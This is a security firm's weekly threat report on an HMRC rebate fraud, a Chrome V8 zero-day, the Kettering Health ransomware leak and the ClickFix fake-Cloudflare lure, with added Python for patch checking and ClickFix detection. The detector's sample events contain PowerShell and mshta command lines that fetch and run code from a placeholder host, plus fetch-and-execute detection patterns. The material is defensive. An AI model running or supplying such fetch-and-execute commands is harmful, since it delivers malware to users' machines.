
09.06.25 Threat Report

This week’s threat report: a £47M HMRC fraud in which criminals exploited over 100,000 taxpayer accounts using phished credentials; malware-laden phishing pages that mimic Cloudflare security checks; a critical Chrome zero-day under active exploitation; a major ransomware breach at a US healthcare provider; and a social engineering method that turns users’ habit of clicking through verification screens into self-inflicted malware execution.


 

1. £47 Million HMRC Fraud: Phishing and Identity Theft at Scale


HMRC is dealing with the aftermath of a fraud campaign worth around £47 million that exploited more than 100,000 taxpayer accounts. Attackers used stolen credentials, mostly harvested through phishing, to file fraudulent rebate claims. Individual taxpayers did not lose money directly; the scheme targeted the UK government itself, at scale.

How It Happened:

  • Fraudsters obtained login credentials and accessed taxpayer accounts via the Government Gateway.

  • Compromised identities were used to submit false rebate claims.

  • In many cases the fraudsters created the Government Gateway account in the victim’s name before the real individual had ever registered, so the victim had no account to watch and no way to notice the activity.

  • HMRC has since locked impacted accounts, deleted credentials, and notified users via letter.

This was not a breach of HMRC’s internal systems but a coordinated abuse of legitimate digital infrastructure using other people’s identities. It is a reminder that identity fraud at scale is as damaging as a direct intrusion, and harder for the victim organisation to see, because every individual login looks legitimate.

Recommendations:

  • If HMRC notifies you, follow the re-registration steps carefully.

  • Regularly audit Government Gateway and business accounts for unexpected access.

  • Provide phishing awareness training across your organisation.

  • Use multi-factor authentication (MFA) wherever available.

 

2. Chrome Zero-Day (CVE-2025-5419) Under Active Exploitation


Google has issued an emergency update for Chrome to fix an actively exploited zero-day, CVE-2025-5419. The flaw is in V8, Chrome’s JavaScript and WebAssembly engine, and allows a remote attacker to trigger heap corruption via a crafted HTML page.

Technical Detail:

  • The vulnerability is an out-of-bounds read and write in Chrome’s V8 engine.

  • Reported by Clement Lecigne and Benoît Sevens of Google’s Threat Analysis Group on 27 May 2025.

  • Mitigated the following day (28 May) by a configuration change pushed to the Stable channel on all platforms, with the code fix shipped in the 137.0.7151.68/.69 release.

  • Google has confirmed that an exploit exists in the wild but, as is its practice, is withholding technical details until most users have updated.

Recommendations:

  • Immediately update Chrome to 137.0.7151.68 or later (137.0.7151.68/.69 for Windows and macOS, 137.0.7151.68 for Linux) and relaunch the browser; a downloaded update does not take effect until Chrome restarts.

  • Ensure other Chromium-based browsers (Edge, Brave, Opera, Vivaldi) receive their vendors’ corresponding V8 fix; their version numbers differ from Chrome’s, so check each vendor’s advisory rather than the Chrome build number.

  • Monitor for unusual web behaviours or redirects in your environment.

  • Use EDR tools that detect anomalous script execution.
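
Checking an estate for the fixed build is where this recommendation usually goes wrong: Chrome versions are four dot-separated integers, and comparing them as text gives the wrong answer ("137.0.7151.9" sorts after "137.0.7151.68" as a string). The following Python is an added example, not code from the original report or from Google; the Chrome fixed build is the one cited above, the inventory rows are constructed, and the fixed builds for Edge, Brave and Opera are deliberately left as unknown placeholders to be filled in from each vendor’s advisory.

```python
"""Flag browser installs still exposed to CVE-2025-5419.

Added example, not from the original report. Parses four-part Chromium
version strings into integer tuples and compares them against the minimum
patched build. Inventory entries below are constructed.
"""
import re

# Minimum patched build per browser. Chrome shipped 137.0.7151.68 (Linux)
# and 137.0.7151.68/.69 (Windows, macOS), so .68 is the floor everywhere.
# None = not known to this script; such entries are reported as "verify".
FIXED_BUILDS = {
    "chrome": (137, 0, 7151, 68),
    "edge": None,   # assumption: fill in from Microsoft's advisory
    "brave": None,  # assumption: fill in from Brave's release notes
    "opera": None,  # assumption: fill in from Opera's release notes
}

VERSION_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d+)\.(\d+)\b")


def parse_version(text):
    """Extract the first a.b.c.d version from text such as
    '137.0.7151.68 (Official Build) (64-bit)' as a tuple of ints,
    or None when no four-part version is present."""
    m = VERSION_RE.search(text)
    return tuple(int(g) for g in m.groups()) if m else None


def assess(browser, version_text):
    """Return 'patched', 'vulnerable', 'verify' (no fixed build known here)
    or 'unparseable' for one installed browser."""
    version = parse_version(version_text)
    if version is None:
        return "unparseable"
    fixed = FIXED_BUILDS.get(browser.lower())
    if fixed is None:
        return "verify"
    # Tuple comparison is element-wise numeric, unlike string comparison.
    return "patched" if version >= fixed else "vulnerable"


def triage(inventory):
    """inventory: iterable of (hostname, browser, version_text).
    Returns {status: [hostnames]} so unpatched hosts can be actioned."""
    out = {"patched": [], "vulnerable": [], "verify": [], "unparseable": []}
    for host, browser, version_text in inventory:
        out[assess(browser, version_text)].append(host)
    return out


# Constructed inventory, shaped like an endpoint-management export.
SAMPLE_INVENTORY = [
    ("ws-01", "chrome", "137.0.7151.68 (Official Build) (64-bit)"),
    ("ws-02", "chrome", "137.0.7151.69 (Official Build) (64-bit)"),
    ("ws-03", "chrome", "137.0.7151.55"),   # an earlier 137 build
    ("ws-04", "chrome", "136.0.7103.114"),  # previous major release
    ("ws-05", "chrome", "137.0.7151.9"),    # text comparison would call this patched
    ("srv-01", "edge", "137.0.3296.52"),    # fixed build unknown here: verify
    ("ws-06", "chrome", "unknown"),
]

if __name__ == "__main__":
    for status, hosts in triage(SAMPLE_INVENTORY).items():
        print(f"{status:12s} {', '.join(hosts) or '-'}")
```

Feed it the version column from whatever asset inventory you already have; the "verify" bucket is a prompt to look up the vendor’s fixed build, not a clean bill of health.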

 

3. Interlock Ransomware Hits Kettering Health: 941 GB Leaked


The Interlock ransomware group has claimed responsibility for a damaging breach at Kettering Health, exfiltrating 941 GB of sensitive data. The Ohio-based health provider suffered prolonged system outages and delayed appointments, and now faces reputational and regulatory fallout.

What Was Leaked:

  • Over 700,000 files, including ID cards, payment data, and financial reports.

  • Data is now listed on Interlock’s dark web leak site.

  • The attack affected electronic health records (EHR), call centres, and patient scheduling systems.

Response:
Kettering Health refused to pay the ransom, opting instead for a full system rebuild. The organisation reports that it has removed the attackers’ persistence tooling and has brought its Epic EHR platform back online.

Recommendations:

  • Maintain regular backups, keep at least one copy offline or immutable so ransomware cannot reach it, and test restoration end to end rather than assuming backups are usable.

  • Apply zero-trust principles to healthcare networks: strong identity, least-privilege access and continuous verification rather than trust based on network location.

  • Segment data storage to reduce breach impact.

  • Train clinical and administrative staff in phishing and ransomware prevention.

 

4. ClickFix Attack Mimics Cloudflare to Deliver Malware


A newly analysed social engineering campaign uses a near-identical clone of Cloudflare’s Turnstile challenge to deliver malware via clipboard manipulation. The method exploits users’ habit of clicking through verification screens without reading them, and their fatigue with such checks.

Attack Chain:

  1. Victims land on a phishing site with a fake Cloudflare Turnstile.

  2. When the victim clicks the fake checkbox, JavaScript on the page silently copies a PowerShell command to the clipboard.

  3. The page then instructs the user to “verify” by pressing Win+R → Ctrl+V → Enter, which pastes the command into the Run dialog and executes it. The victim has run the malware themselves.

  4. Payloads observed range from information stealers such as Lumma to remote access tools such as NetSupport Manager, a legitimate remote administration product abused as a RAT.

Why It Works:

  • Leverages living-off-the-land binaries (LOLBins) such as powershell.exe and mshta.exe, so the first stage is a trusted, signed Windows component rather than attacker tooling.

  • Evades controls that look for a malicious download or browser exploit: nothing is dropped by the browser and the victim types the command, so detection depends on process lineage (explorer.exe spawning a script host) and command-line content rather than on file scanning.

  • Victims believe they’re passing a routine security check.

Recommendations:

  • Educate staff on spotting fake CAPTCHA pages and pop-ups.

  • Restrict PowerShell where it is not needed: apply AppLocker or WDAC rules and Constrained Language Mode for standard users, and consider removing the Run dialog (Group Policy: User Configuration > Administrative Templates > Start Menu and Taskbar > “Remove Run menu from Start Menu”, which also disables Win+R) for users who have no need for it. Enable PowerShell script block logging so any command that does run is recorded.

  • Implement browser isolation for sensitive workflows.

  • Use threat intelligence feeds to monitor phishing infrastructure.
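
Because the chain above leaves no dropped file to scan, detection comes down to process lineage and command-line content. The following Python is an added example, not code from the original report or from any vendor: it scores Sysmon Event ID 1 style process-creation records for explorer.exe (the Win+R Run dialog) spawning a script host whose command line fetches and executes remote content, and decodes -EncodedCommand payloads so the same indicators apply to the hidden script. The events, hostnames and URLs are constructed. The “I am not a robot” lure comment is a pattern assumed from public ClickFix reporting (it is left in the command so the Run box looks benign), not something the report above describes.

```python
"""Heuristic detection of ClickFix-style execution in process-creation logs.

Added example, not from the original report. Scores Sysmon Event ID 1 style
records for the chain described above: explorer.exe (the Win+R Run dialog)
spawning a script host whose command line fetches and runs remote content.
All events, hosts and URLs below are constructed.
"""
import base64
import re

# Script hosts and LOLBins that ClickFix lures hand their command to.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "bitsadmin.exe"}

# -e / -ec / -enc / -EncodedCommand followed by the base64 blob.
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# (pattern, weight, label), applied to the raw command line plus any decoded
# -EncodedCommand script.
INDICATORS = [
    (re.compile(r"-(?:e|ec|enc|encodedcommand)\s", re.I), 2, "encoded command"),
    (re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I), 2, "hidden window"),
    (re.compile(r"-nop\b|-noprofile\b", re.I), 1, "no profile"),
    (re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I), 1, "execution policy bypass"),
    (re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
                r"downloadfile|curl|wget)\b", re.I), 2, "remote fetch"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 3, "in-memory execution"),
    (re.compile(r"mshta(?:\.exe)?\s+https?://", re.I), 3, "mshta loading remote HTA"),
    # Lure text left in the command so the Run box looks benign. Assumption
    # based on public ClickFix reporting, not on the report above.
    (re.compile(r"not a robot|verification id|captcha", re.I), 3, "CAPTCHA lure comment"),
]
THRESHOLD = 4


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand, or '' if absent/invalid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # bad padding/alphabet (binascii.Error) or bad UTF-16
        return ""


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse_event(event):
    """Score one process-creation event; return a finding dict or None."""
    image = basename(event.get("Image", ""))
    if image not in SCRIPT_HOSTS:
        return None
    cmdline = event.get("CommandLine", "")
    text = cmdline + "\n" + decode_encoded_command(cmdline)
    score, reasons = 0, []
    if basename(event.get("ParentImage", "")) == "explorer.exe":
        score += 2
        reasons.append("spawned by explorer.exe (Run dialog or shell)")
    for pattern, weight, label in INDICATORS:
        if pattern.search(text):
            score += weight
            reasons.append(label)
    if score < THRESHOLD:
        return None
    return {"host": event.get("Computer", "?"), "image": image,
            "score": score, "reasons": reasons}


def scan(events):
    """Return findings for every event at or above THRESHOLD, in input order."""
    return [f for f in (analyse_event(e) for e in events) if f]


def _encode(script):
    """Build a constructed sample only: -EncodedCommand takes base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed
    {"Computer": "ws-01", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": 'powershell -w hidden -nop -c "iex (iwr https://verify.example.invalid/c.txt)" '
                    '# I am not a robot - Verification ID: 4921'},
    {"Computer": "ws-02", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell -EncodedCommand "
                    + _encode("iex (irm https://verify.example.invalid/p.txt)")},
    {"Computer": "ws-03", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://verify.example.invalid/check.hta"},
    # Benign: scheduled task running a local script, not launched from explorer.
    {"Computer": "srv-01", "ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS,
     "CommandLine": r"powershell -File C:\Scripts\Invoke-Inventory.ps1"},
    # Benign: Run dialog used to open Notepad.
    {"Computer": "ws-04", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['host']}: {f['image']} score={f['score']} {', '.join(f['reasons'])}")
```

The weights are a starting point to tune against your own baseline; the point is that the explorer.exe parent plus a fetch-and-execute command line is the signal, and that a detection which only inspects the raw command line misses the -EncodedCommand variant.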

 

Threat Intelligence Offerings

Stay ahead of emerging cyber threats with real-time insights from Periculo. Our updates provide you with critical information on the latest vulnerabilities, attacks, and security trends—all designed to help you protect your business and make informed decisions.

Contact us for more information

 

Subscribe to the Periculo Threat Feed today. Your first line of defence starts with staying informed.

Subscribe Here!